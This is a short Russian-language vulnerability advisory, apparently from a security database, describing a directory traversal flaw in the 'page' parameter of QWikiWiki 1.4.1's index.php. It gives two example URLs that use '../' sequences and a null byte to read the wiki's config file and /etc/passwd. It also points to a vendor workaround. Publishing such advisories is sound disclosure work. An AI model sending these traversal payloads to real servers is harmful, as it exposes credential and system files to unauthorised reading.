Обход каталога в QWikiWiki

Дата публикации:
06.01.2005
Всего просмотров:
922
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
QwikiWiki 1.x
Уязвимые версии: QWikiWiki 1.4.1

Описание:
Обнаружена уязвимость в QWikiWiki. Злоумышленник может просмотреть произвольные файлы на уязвимой системе.

Уязвимость существует в параметре page сценария index.php. Злоумышленник может с помощью специально сформированного URL просмотреть произвольные файлы на системе. Пример:

http://[target]/qwiki/index.php?page=../_con fig.php%00

http://[target]/qwiki/index.php?page=../../../../../../etc/passwd%00

URL производителя: http://www.qwikiwiki.com

Решение: Временное решение
http://www.qwikiwiki.com/index.php?page=QwikiVulnerability

Ссылки: QWikiwiki directory traversal vulnerability

или введите имя

CAPTCHA